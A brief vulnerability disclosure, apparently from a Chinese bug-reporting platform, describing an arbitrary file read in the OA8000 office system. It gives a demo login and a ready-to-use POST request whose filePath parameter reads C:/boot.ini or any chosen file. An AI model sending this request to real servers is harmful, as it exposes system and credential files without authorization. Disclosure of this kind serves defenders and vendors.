### 简要描述:
Just another bug.
### 详细说明:
以官网http://demo.oa8000.com/为例,
user:123456
登陆后,
向 http://demo.oa8000.com/OAapp/WebObjects/OAapp.woa/wa/TraceOpenPage POST如下参数:
fileType=txt&jumpToPage=HtFile0141&initFromJsp=true&filePath=C%3A%2Fboot.ini&updateFlg=false
将filePath更改为待读取文件的绝对路径即可。
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201406/20222826a37cc30a760461454c9251aa6cde254b.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/20222826a37cc30a760461454c9251aa6cde254b.png)
[<img src="https://images.seebug.org/upload/201406/20222837c565c6e19b73037247920140ad3edfaf.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/20222837c565c6e19b73037247920140ad3edfaf.png)
京公网安备 11010502034610号
暂无评论